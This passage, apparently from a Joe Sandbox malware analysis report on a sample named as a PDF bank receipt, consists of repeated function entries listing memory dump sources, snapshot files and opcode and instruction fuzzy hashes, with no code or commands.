                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f7cda6b636c677c017cd727901c48c58592889d4901f46b34a5ab1dbc87a09fd
                                                                                                                • Instruction ID: 60b164d4f78f4d08cb1295ad8e517175c64c29430000f718838db9b3646e93b7
                                                                                                                • Opcode Fuzzy Hash: f7cda6b636c677c017cd727901c48c58592889d4901f46b34a5ab1dbc87a09fd
                                                                                                                • Instruction Fuzzy Hash: 93D1CF74E04218CFDB54DFA5D944B9DBBB2FF89300F2084AAD818AB265DB345E85CF50
                                                                                                                Function 06DB68D8 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 05246e1c09ea2d0afd045ca50ce9c5a26fadcc835cd1ddc9deff59b79506ddc5
                                                                                                                • Instruction ID: ddd6acba76ad72be8a9fc48a6fff9a5f56e6b30c6919b060abff8b9f3587c016
                                                                                                                • Opcode Fuzzy Hash: 05246e1c09ea2d0afd045ca50ce9c5a26fadcc835cd1ddc9deff59b79506ddc5
                                                                                                                • Instruction Fuzzy Hash: D1D19B74E00218CFDB54DFA5D990B9DBBB2BF89300F2090A9D809AB369DB359D85CF50
                                                                                                                Function 06DB9AD0 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6c52335c3188924b1cef05f3de2a57f3fdceb648cbd7797e5b9aa07c231139a5
                                                                                                                • Instruction ID: bb4e056e808034bcfd056c78192baa4d6dc6904024a038dd647de6924fd1dc44
                                                                                                                • Opcode Fuzzy Hash: 6c52335c3188924b1cef05f3de2a57f3fdceb648cbd7797e5b9aa07c231139a5
                                                                                                                • Instruction Fuzzy Hash: 6ED1AB74E00218CFDB54DFA9D990B9DBBB2BF89300F2090A9D809AB369DB355D85CF50
                                                                                                                Function 06DB88C8 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ebc046ff00360d7490b3857b341e9a87b439f713377a3b968cd0acdb37f6a1d2
                                                                                                                • Instruction ID: dc1231122185a6497bf34797a579b869663fadd7950e5b7c2de62bf981d86adf
                                                                                                                • Opcode Fuzzy Hash: ebc046ff00360d7490b3857b341e9a87b439f713377a3b968cd0acdb37f6a1d2
                                                                                                                • Instruction Fuzzy Hash: FDD1AB74E00218CFDB54DFA5D980B9DBBB6BF89300F1090AAD809AB369DB349D85CF55
                                                                                                                Function 06DBBAC0 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 62ccef6c34668ad501c76ba3debed373bfb46280b4d61d54c659746a1188be7b
                                                                                                                • Instruction ID: c00db7d363b198a35749b3ea7a56eb33fb9629bf919d77ca53add513819c35a6
                                                                                                                • Opcode Fuzzy Hash: 62ccef6c34668ad501c76ba3debed373bfb46280b4d61d54c659746a1188be7b
                                                                                                                • Instruction Fuzzy Hash: E4D18B74E002188FDB54DFA5D980B9DBBB6FF89300F2090AAD809AB369DB355D85CF51
                                                                                                                Function 06DB48E8 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4809fd233cf0444f672ec70ce440bcc0c4f1233808e82ac803dfc75a901b1f56
                                                                                                                • Instruction ID: 4e9b3cae74c49a3a9ce99afaa26bb78aedfbd83fae9ef01cdbe20daa0e52c437
                                                                                                                • Opcode Fuzzy Hash: 4809fd233cf0444f672ec70ce440bcc0c4f1233808e82ac803dfc75a901b1f56
                                                                                                                • Instruction Fuzzy Hash: 2FD18B74E00218CFDB54DFA9D980B9DBBB2BF89300F1090A9D809AB369DB359D85CF55
                                                                                                                Function 06DB5698 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 40dcaa88dde4cfb70e75eb2e8ac1888d16c5391ca1347caaa96eb56832777910
                                                                                                                • Instruction ID: 5381e18c434cba3da5d54e9d2e656ff46697bf3b8d880fce090ddd445473b207
                                                                                                                • Opcode Fuzzy Hash: 40dcaa88dde4cfb70e75eb2e8ac1888d16c5391ca1347caaa96eb56832777910
                                                                                                                • Instruction Fuzzy Hash: 8CD19A74E00218CFDB54DFA9D980B9DBBB2BF89300F1090A9D809AB369DB759D85CF51
                                                                                                                Function 06DB7688 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b9b69604f2330c1fe33557c62e5b138efa7edd7d1ab0c9305eeca6b2d4ced950
                                                                                                                • Instruction ID: 315f7dc4a8725330162c2c8c1c823b33c7162ecd0b97af2e6efbce4277585bd5
                                                                                                                • Opcode Fuzzy Hash: b9b69604f2330c1fe33557c62e5b138efa7edd7d1ab0c9305eeca6b2d4ced950
                                                                                                                • Instruction Fuzzy Hash: 58D19B74E002188FDB94DFA5D940B9DBBB2FF89300F1090A9D809AB369DB359E85CF51
                                                                                                                Function 06DBA880 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5892f0328414a45c7583189b1be11150342bdc30097702fcfecca80630a20d1f
                                                                                                                • Instruction ID: 56aa4e4b2229fdb9bc737da1f35172ef3b103ce70849fe7526853662cf1dee04
                                                                                                                • Opcode Fuzzy Hash: 5892f0328414a45c7583189b1be11150342bdc30097702fcfecca80630a20d1f
                                                                                                                • Instruction Fuzzy Hash: FCD18A74E002188FDB54DFA5D940B9DBBB2FF89300F2090A9D809AB369DB359D85CF55
                                                                                                                Function 06DB36A8 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 07621a83f96765e4cd44311a6fe663abcac94b1395049d345fb54145de4cd0d4
                                                                                                                • Instruction ID: e2120bc4643385daf86b79c602f4bf185dc724cf1fb7ada237f4973c70d17223
                                                                                                                • Opcode Fuzzy Hash: 07621a83f96765e4cd44311a6fe663abcac94b1395049d345fb54145de4cd0d4
                                                                                                                • Instruction Fuzzy Hash: 24D18B74E00218CFDB54DFA5D950B9DBBB2BF89300F1090A9D809AB369DB359D85CF51
                                                                                                                Function 06DB4458 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: da31197bf39b8eae35917c4d32ad9f6b6e1a68c2d53018222e120a8395372a1f
                                                                                                                • Instruction ID: addd9b966605425f6cf70eea04da1fbb7027ea53ba8b1b00bea963ec53d7ae87
                                                                                                                • Opcode Fuzzy Hash: da31197bf39b8eae35917c4d32ad9f6b6e1a68c2d53018222e120a8395372a1f
                                                                                                                • Instruction Fuzzy Hash: 12D19B74E00218CFDB54DFA5D940B9DBBB2BF89300F1090A9D809AB369DB359D85CF51
                                                                                                                Function 06DB6448 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 29d2bb608b9a9f8a79f02804a4b706f9c6fbf2b07061df6aa84aa4cde5457f82
                                                                                                                • Instruction ID: 8db52e006522b0e7fa66be886591db8632735e08b1423601cbaccbc2948e9ab6
                                                                                                                • Opcode Fuzzy Hash: 29d2bb608b9a9f8a79f02804a4b706f9c6fbf2b07061df6aa84aa4cde5457f82
                                                                                                                • Instruction Fuzzy Hash: 0CD19A74E00218CFDB54DFA9D990B9DBBB2BF89300F1090A9D809AB369DB359D85CF51
                                                                                                                Function 06DB9640 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d5d2e8c5efb7cb5bbaa98950c15219f551e90eb938a8715b258fffd408d77e72
                                                                                                                • Instruction ID: 0cfe142b43baef09cb74d98720910a25956975f453170b017b5e0077e02cc9ca
                                                                                                                • Opcode Fuzzy Hash: d5d2e8c5efb7cb5bbaa98950c15219f551e90eb938a8715b258fffd408d77e72
                                                                                                                • Instruction Fuzzy Hash: 30D19A74E00218CFDB54DFA9D990B9DBBB2BF89300F1090A9D809AB369DB359D85CF51
                                                                                                                Function 06DBC870 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: aed7e3bb23566951d009e7ec538ae31a223585ab409178dde5d32ef4b5c56a77
                                                                                                                • Instruction ID: a5388e1990c99494e3e1308cb0b9b4f929194d2cd8d8a61e75acbc85bd511dff
                                                                                                                • Opcode Fuzzy Hash: aed7e3bb23566951d009e7ec538ae31a223585ab409178dde5d32ef4b5c56a77
                                                                                                                • Instruction Fuzzy Hash: 14D19B74E00218CFDB54DFA5D980B9DBBB2BF89300F1090A9D809AB369DB755D85CF51
                                                                                                                Function 06DB3218 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 74f12498b682f1c3fa83fa40779e47ae87055c63e0f4727ee6a44a137631a1e3
                                                                                                                • Instruction ID: d0e76eb2473d2e21e925ba46fd1f8cbd4970542061ccca509b94aa69abfa6030
                                                                                                                • Opcode Fuzzy Hash: 74f12498b682f1c3fa83fa40779e47ae87055c63e0f4727ee6a44a137631a1e3
                                                                                                                • Instruction Fuzzy Hash: 7DD19A74E00218CFDB54DFA5D980B9DBBB2BF89300F1090A9D809AB369DB355D85CF51
                                                                                                                Function 06DB5208 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 84a4107a6634dba7863e15e09f7f5031eda00d6553ea3aec62d02cb032d656c4
                                                                                                                • Instruction ID: 1729f860d6383bfefe28d6a014a5af6e284b9fa63888eff8e1023e233e9f39e2
                                                                                                                • Opcode Fuzzy Hash: 84a4107a6634dba7863e15e09f7f5031eda00d6553ea3aec62d02cb032d656c4
                                                                                                                • Instruction Fuzzy Hash: 4ED19A74E00218CFDB54DFA9D990B9DBBB2BF89300F1090A9D809AB369DB359D85CF51
                                                                                                                Function 06DB8438 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1009d2829150ec78ab5211d1b5dade9febf9becf6ae707d2c19bb65115f19bcb
                                                                                                                • Instruction ID: 2bae047c9757ba174eef36f00bdf550b59c20d7d63325b9ddfd29777f98b7f52
                                                                                                                • Opcode Fuzzy Hash: 1009d2829150ec78ab5211d1b5dade9febf9becf6ae707d2c19bb65115f19bcb
                                                                                                                • Instruction Fuzzy Hash: 6FD19B74E00218CFDB54DFA9D940B9DBBB6BF89300F1090A9D809AB369DB359D85CF51
                                                                                                                Function 06DBB630 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f84ecede2f1d71a7d31d3c23093effabf7468353fed01bdb63dad70713ab18c6
                                                                                                                • Instruction ID: 0c98a2ad253712c8c3748e54d0ae6226f34ddac0ed01b95c5fe14ae2dc87c8d0
                                                                                                                • Opcode Fuzzy Hash: f84ecede2f1d71a7d31d3c23093effabf7468353fed01bdb63dad70713ab18c6
                                                                                                                • Instruction Fuzzy Hash: ABD18B74E002188FDB54DFA5D940B9DBBB2BF89300F1090AAD809AB369DB759D85CF51
                                                                                                                Function 06DB0E20 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 29957afc090aa663b8195115486e60a84996329625a21df30e196dfb848d26b0
                                                                                                                • Instruction ID: 59491d2e532adfc8960f665fa638e0a594c68bde20ed367293e0999e676f72fe
                                                                                                                • Opcode Fuzzy Hash: 29957afc090aa663b8195115486e60a84996329625a21df30e196dfb848d26b0
                                                                                                                • Instruction Fuzzy Hash: 0CD1AC74E00218CFDB54DFA5D990B9DBBB2BF89300F1090A9D809AB369DB355D85CF50
                                                                                                                Function 06DB3FC8 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 91717b7cd03867a9cd5bec89876167ce4dbe9f19044599e43bb1645f6343e59c
                                                                                                                • Instruction ID: 17d49bbbb781fce1b4e42b2c4452bd54dfb1a51cace4f3e488eebd5f57e019de
                                                                                                                • Opcode Fuzzy Hash: 91717b7cd03867a9cd5bec89876167ce4dbe9f19044599e43bb1645f6343e59c
                                                                                                                • Instruction Fuzzy Hash: AAD18B74E00218CFDB54DFA5D990B9DBBB2BF89300F1090A9D809AB369DB359D85CF51
                                                                                                                Function 06DB71F8 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2a545b3195b42b6d16529c95f87224d10f07591da6b8f4940e60f78d0f4c0083
                                                                                                                • Instruction ID: 4e85f6e741cbf333b3e8c4fa52821e5f2e9b25eed6b981aecf3f8ae6cb1d216a
                                                                                                                • Opcode Fuzzy Hash: 2a545b3195b42b6d16529c95f87224d10f07591da6b8f4940e60f78d0f4c0083
                                                                                                                • Instruction Fuzzy Hash: C3D19A74E002188FDB94DFA9D950B9DBBB2BF89300F1090A9D809AB369DB359D85CF51
                                                                                                                Function 06DBA3F0 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 87b4e4511b73f416d172e968b99b55daae605d6f6b3960cb052c14c952fc5121
                                                                                                                • Instruction ID: 182b0041e68e03de3fcc4d8d9dfec78aec9e92ab69b3ca4ce28ff2fbe6364b95
                                                                                                                • Opcode Fuzzy Hash: 87b4e4511b73f416d172e968b99b55daae605d6f6b3960cb052c14c952fc5121
                                                                                                                • Instruction Fuzzy Hash: 50D18A74E002188FDB54DFA9D980B9DBBB2FF89300F1090A9D809AB369DB359D85CF55
                                                                                                                Function 06DBC3E0 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d71086c887ae43a41ccecae44e7bbcd60b7ee6a677bbccac05cff3af7e55263c
                                                                                                                • Instruction ID: 6ad5c0582979d67f18a5606b2606cbe5a3305a63d48ad872453fcc0de0ca92e6
                                                                                                                • Opcode Fuzzy Hash: d71086c887ae43a41ccecae44e7bbcd60b7ee6a677bbccac05cff3af7e55263c
                                                                                                                • Instruction Fuzzy Hash: 86D18B74E002188FDB54DFA5D940B9DBBB2BF89300F1090A9D809AB369DB355D85CF51
                                                                                                                Function 06DBD190 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d05cce95f242fdd1993dd5f72afadc3eb1d5a9723dfe9b15356483283d666c77
                                                                                                                • Instruction ID: 32709466fef6f7cde6ba9cd204d0ad34cd2a61de8a2dcb671829cac2a97ad7c6
                                                                                                                • Opcode Fuzzy Hash: d05cce95f242fdd1993dd5f72afadc3eb1d5a9723dfe9b15356483283d666c77
                                                                                                                • Instruction Fuzzy Hash: 3DD18A74E002188FDB54DFA9D980B9DBBB2FF89300F1090A9D809AB369DB359D85CF55
                                                                                                                Function 06DB2D88 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1cdfab9836885c8194dfff615ae8cb724c72b601de855f4cf259fb2627cc4709
                                                                                                                • Instruction ID: 398b11bbda944e63191d5d6e1696ea86e456e4234f6540ffe2f003def9a69686
                                                                                                                • Opcode Fuzzy Hash: 1cdfab9836885c8194dfff615ae8cb724c72b601de855f4cf259fb2627cc4709
                                                                                                                • Instruction Fuzzy Hash: 5FD19B74E00218CFDB54DFA9D980B9DBBB6BF89300F1090A9D809AB369DB359D85CF51
                                                                                                                Function 06DB5FB8 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1bd6ea9d200d0a70ca9626f43df983803dfe40b5e810364255d67bb01d7110ed
                                                                                                                • Instruction ID: e4ab8888bfcf83633da76ee4cd8b4d116f50bc9da07028399c2d1e9312afb152
                                                                                                                • Opcode Fuzzy Hash: 1bd6ea9d200d0a70ca9626f43df983803dfe40b5e810364255d67bb01d7110ed
                                                                                                                • Instruction Fuzzy Hash: D4D17A74E002188FDB94DFA5D990B9DBBB2BF89300F1090A9D809AB369DB359D85CF51
                                                                                                                Function 06DB7FA8 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9f3b6c424ff438616c265982ddf408a64d1f5f8accf1b014a9b849ab7cc420fc
                                                                                                                • Instruction ID: bdc3ff3e95231d10e805b86f190c492b68fff1f566d193c145d6e251add835d3
                                                                                                                • Opcode Fuzzy Hash: 9f3b6c424ff438616c265982ddf408a64d1f5f8accf1b014a9b849ab7cc420fc
                                                                                                                • Instruction Fuzzy Hash: 8ED1AB74E00218CFDB94DFA5D940B9EBBB6BF89300F1090A9D809AB369DB359D85CF50
                                                                                                                Function 06DBB1A0 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: df11d37a7f879e717ab441b89bbd6cc7c2d5e3878352fb229be5f22a63a9613d
                                                                                                                • Instruction ID: 6361c38af22c2decfd87c02b79c909d62d4da049a7d285891419b2c40ecd8baf
                                                                                                                • Opcode Fuzzy Hash: df11d37a7f879e717ab441b89bbd6cc7c2d5e3878352fb229be5f22a63a9613d
                                                                                                                • Instruction Fuzzy Hash: 45D18B74E00218CFDB54DFA5D980B9DBBB2BF89300F1090AAD809AB369DB359D85CF55
                                                                                                                Function 06DB8D58 Relevance: .3, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
